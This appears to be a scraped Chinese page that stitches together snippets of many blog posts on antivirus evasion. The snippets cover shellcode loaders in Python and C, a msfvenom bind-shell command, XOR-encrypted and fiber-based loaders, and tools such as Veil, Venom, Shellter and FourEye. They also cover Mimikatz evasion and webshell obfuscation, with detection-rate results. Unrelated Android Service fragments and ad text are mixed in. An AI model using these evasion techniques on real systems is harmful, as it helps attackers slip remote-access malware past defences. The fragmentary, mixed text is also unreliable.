0x03 为什么使用python python语言入门门槛低,上手快,且两三年前就出现了这种免杀方式,但是很多人说网上公开的代码已经不免杀了。事实真的如此吗?...你有没有静下心来code过,是否去了解过相关的原理,是否通过学习到的原理去思维发散过,是否通过code去fuzz过?...blog.csdn.net/C_chuxin/article/details/82962797https://blog.csdn.net/qq_34444097/article/details/103027906 0x05 免杀原理...总结:本文所阐述的粗略且浅显的免杀方法都是站在CobaltStrike强大的肩膀上实现的。...0x09 总结 此种方式的缺点:单文件体积过大,go语言比较小,veil里面有使用go进行免杀的,单文件体积在800kb左右,如果你学过go的语法,建议你利用go语言来免杀,具体操作,你可以在使用veil
文章首发于:奇安信补天攻防社区 https://forum.butian.net/share/1690 0x00 前言 python shellcode免杀的常用手法,实现过常见AV的效果。...本文分为几个部分: 1、shellcode加载器实现; 2、代码混淆; 3、寻找免杀api 4、分离免杀,分离加载器与shellcode; 5、python打包成exe 6、组合,免杀效果分析 0x01...但是现在并没有任何免杀效果。...pyinstaller或者py2exe、cx_Freeze 我们使用不同的打包程序,最后免杀的效果也不太一样,部分杀软对打包程序本身就加入了特征检测... pyinstaller 安装: python3...反序列化 + pyinstaller+python3 : 0x07 小节 免杀的方式多种多样,这只是免杀技术的冰山一角角。
免杀的常用手法,实现过常见AV的效果。...本文分为几个部分: 1、shellcode加载器实现; 2、代码混淆; 3、寻找免杀api 4、分离免杀,分离加载器与shellcode; 5、python打包成exe 6、组合,免杀效果分析 0x01...但是现在并没有任何免杀效果。...pyinstaller或者py2exe、cx_Freeze 我们使用不同的打包程序,最后免杀的效果也不太一样,部分杀软对打包程序本身就加入了特征检测... pyinstaller 安装: python3...反序列化 + pyinstaller+python3 : 0x07 小节 免杀的方式多种多样,这只是免杀技术的冰山一角角。
输入命令: msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c 接着在Python中调用ctypes库,定义一个存在该shellcode.../usr/bin/python #coding=utf-8 from ctypes import * shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5...(image-8dd4e5-1564281446348)] 2、免杀验证: 这里在国内正常是访问不了书上的vscan.novirusthanks.org的,但是下面的验证脚本可以借鉴一下: [ 复制代码...换一个国内的Virscan在线扫描来进行免杀验证:http://www.virscan.org/ 2/29,3.1%的查杀率。 通过对比发现,本章节的方法实现的后门的免杀效果还是很强的。...简单概述来说,就是通过msf生成的后门,第一种可以直接生成exe文件、但是很容易被查杀掉;第二种就是生成c文件,然后通过Python的ctypes库来执行该C语言的payload,接着再将该py文件转换成
1.设置好监听 2.用cs生成python的payload 3.复制出生成的payload,进行base64加密 4.把加密后的内容放在txt里,再放到公网网站上 例:http://example.com
免杀能力一览表 ? 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。...4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。...5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。...原理很简单,不过我在前期测试中浪费了很长时间。。...免杀效果整体感觉一般,还是python生成exe,执行后调用powershell下载Invoke-Shellcode.ps1,然后反弹shell,应该很容易触发杀软的行为检测。
service服务是一个应用程序的四大组件之一,可以在后台执行长时间运行的操作,不提供用户界面。一个应用程序组件可以启动一个服务,它将继续在后台运行,即使用户切...
实现服务有两种方式,继承service或者IntentService。后者是前者的子类。前者包含上一章节中Service的几个重要的方法,用于普通的服务。后者可...
—-网易云热评 一、简介 快速生成免杀exe可执行文件,目前拥有三种免杀的方法 二、下载及安装 1、下载到本地 git clone https://github.com/lengjibo/FourEye.git...2、进入该文件夹 cd FourEye 3、安装需要的python库 pip install -r requirements.txt 三、使用方法 1、打开该软件 python3 BypassFramework.py...2、显示可生成的软件,list 3、选择shellcode,显示可选择的免杀方式 4、选择fibers免杀方式,加密方式选择xor,输入shellcode,选择平台的位数,execute运行
免杀是同所有的检测手段的对抗,目前免杀的思路比较多。本篇介绍了一个独特的思路,通过内存解密恶意代码执行,解决了内存中恶意代码特征的检测。...原文链接:https://forum.butian.net/share/2669 0x00 前言 免杀是同所有的检测手段的对抗,目前免杀的思路比较多。...0x02 流程 通过双重 xor 对shellcode进行加密 申请内存执行指定命令 通过计算地址执行解密函数指令后执行shellcode 效果: 0x03 免杀制作思路 1、静态免杀 杀软是通过标记特征进行木马查杀的...(int i = 5;i<sizeof(shellcode);i++) { ((char*)p)[i] = ((char*)p)[i]^184^6; } } 2、动态免杀...主要原理是获取 PEB 结构体中的NumberOfProcessors字段值来进行判断。它在结构体中偏移量为0x64。
如何免死 3.1 onStartCommand方法中,返回START_STICKY 在StartCommand()几个常量: START_STICKY 系统重新创建服务并且调用onStartCommand
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus ---- 免杀能力一览表 ?...4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。...5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。...virustotal.com中39/71个报毒,以为能过360和火绒,免杀应该不错的... ?...原理比较简单,操作比较方便,免杀效果相比专题12里的Green-Hat-Suite来说虽然一般,但能过360、火绒和瑞星的确有点出人意料。
别人的静态免杀 在Github上看到一个c++的免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒: 项目地址:https://github.com/G73st...复现其他师傅的免杀 2.1 c++部分 其实他这部分代码的逻辑就是一个利用自己的密钥进行解密,解密之后再申请内存,执行shellcode,在这里先将别人的代码下载下来,在本地跑一下: 先把项目下载,然后把...免杀Windows Defender 对于作者一个月以前的更新,可以过Windows Defender,但是现在只能免杀火绒,在这里对此做一个小小的改动,就可以达到以前的那种效果,但是依旧无法过360(...因为免杀一直会被标记,此处的tips暂不提供,希望师傅能够理解) 此时最新版的Windows Defender 上线成功: 但是!!!...当然,在这个免杀中,均属于静态免杀,有些属于乱杀,就像碰到易语言一样,大家都杀!
免杀实战—小马免杀 引用免杀 因为D盾、安全狗、护卫神会对关键字eval中的执行变量进行溯源,当追溯到要执行的变量为一个通过POST接收的可疑数据时就会显示可疑木马,为了躲避这种溯源方式,可以通过多次使用...幸好今天"反引号"大哥来串门,不妨让他来帮个忙: 发现成功免杀,之后我们再使用安全狗查杀一下看看————成功免杀 护卫神————成功免杀 至此,成功免杀安全狗、护卫神、D盾,之后我们试试可用性:...,例如: 至于设计原理上面的注释中想必已经说得很是详细了,这里就不再一一复述了,下面我们使用D盾进行查杀看看——免杀 之后使用安全狗查杀看看————成功免杀 之后使用护卫神查杀看看————成功免杀 至此...之后使用安全狗查杀————成功免杀 之后使用护卫神查杀————成功免杀 至此,成功免杀D盾、安全狗、护卫神,之后我们使用菜刀连接试试看是否可以正常使用: 免杀实战—大马免杀 加密&混淆 在免杀处理的众多方法中...之后使用安全狗查杀————成功免杀 之后使用护卫神查杀————成功免杀 至此,成功免杀D盾、安全狗、护卫神,之后我们试试可用性: 文末小结 这篇免杀文章最初写作与2019年10月份左右,文中涉及到的免杀技巧大多数是较为成熟的技巧
://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w 3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com...5、远控免杀专题(5)-Veil免杀(VT免杀率23/71): https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw 6、远控免杀专题(6)-Venom免杀...(VT免杀率11/71):本文 文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus ---- 免杀能力一览表 ?...---- 前言 Venom和Veil、Shellter是三大老牌免杀工具,免杀主要依靠分离执行和加密混淆等技术,可以和msf无缝对接。...注入一个模板(例如:python),并使用类似gcc、mingw32或pyinstaller之类的编译器生成可执行文件。
一种python反序列化免杀方式 1简介 一种python反序列化免杀方式,过火绒、360、windows defender 2正文 一个python加载器 下面具体举例一个python分离加载的例子...ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) 意料之中,烂大街的代码,一定过不了免杀的...运用反序列化简单免杀 初步尝试下火绒&&360的免杀能力,这两个相对简单些 加入反序列化语句,进行编码如下 #pickle dump import pickle shellcode=""" importctypes...shellcode= f_obj.decrypt(shellcode)") print("shellcode= bytearray(shellcode)") #shellcode 加密你也可以分离免杀...,随着免杀的公开->杀毒的提升,免杀的难度也会随之提升 切记,免杀学的是思路,不是具体的方法,本文的也只是提供了一个思路,擅于思考,也多多考虑多种方法结合。
5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):本文 文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus ---- 免杀能力一览表...---- 前言 Veil、Venom和Shellter是三大老牌免杀工具,虽然说人怕出名猪怕壮,但目前这几款免杀工具在扩展性和免杀能力方面依然有着不错的表现。...Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测...像python这类的与用户有较高的交互就容易被查杀。...veil原理可以参考这篇文章:https://xz.aliyun.com/t/4191 使用veil直接生成exe(VT查杀率44/70) veil可以直接生成支持msf的payload,我们先试一下看看效果
spm_id_from=333.999.0.0&vd_source=4652172a15b97e23a4fc522adb2ef705 使用纤程免杀 纤程Fiber的概念:纤程是比线程的更小的一个运行单位...binaryxor 选择异或次数 4、生成之后,全选 edit – copy as c code,填入到上面的实现代码中,异或次数按照刚刚设置的进行修改 5、gcc xc2.c -mwindows编译生成exe 免杀效果...但是这是杀软自己模拟出的一个环境。...fibersapi.h DWORD result = FlsAlloc(NULL); if (result == FLS_OUT_OF_INDEXES) { return 0; } 使用求反免杀
://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w 3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com...5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw 6、远控免杀专题(6)-Venom免杀...(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ 7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69):本文 文章打包下载及相关软件下载...---- 前言 Shellter和Venom、Veil是三大老牌免杀工具,Shellter是一个开源的免杀工具,利用动态Shellcode注入或者命令来实现免杀的效果。...团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。
一 前言 尝试对Mimikatz进行免杀,提取Mimikatz的shellcode,然后使用免杀的加载器进行加载,用加载器在加载cs shellcode时免杀效果挺好,但在加载Mimikatz的shellcode...发现直接被360、defender等静态查杀了,VT上报毒也很高,于是尝试找出问题并进行免杀。...图像法减少熵值 在网上没有找到将shellcode封装进图片的代码,自己写又太麻烦,而且不知道免杀效果如何,如果花费大力气写出来发现免杀效果不好不是白忙活了吗?...后面更换的动态回调加载器: 为了增加免杀能力对字符串进行了加密,并用动态生成key。...四 最后 前面讲的熵减法Mimikatz免杀的内容是十几天之前做的,基于intel c++编译器到达的VT全免杀效果,加了一点动态免杀,以过defender动态查杀,第二项的效果图是最近的,此时的intel
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
云直播
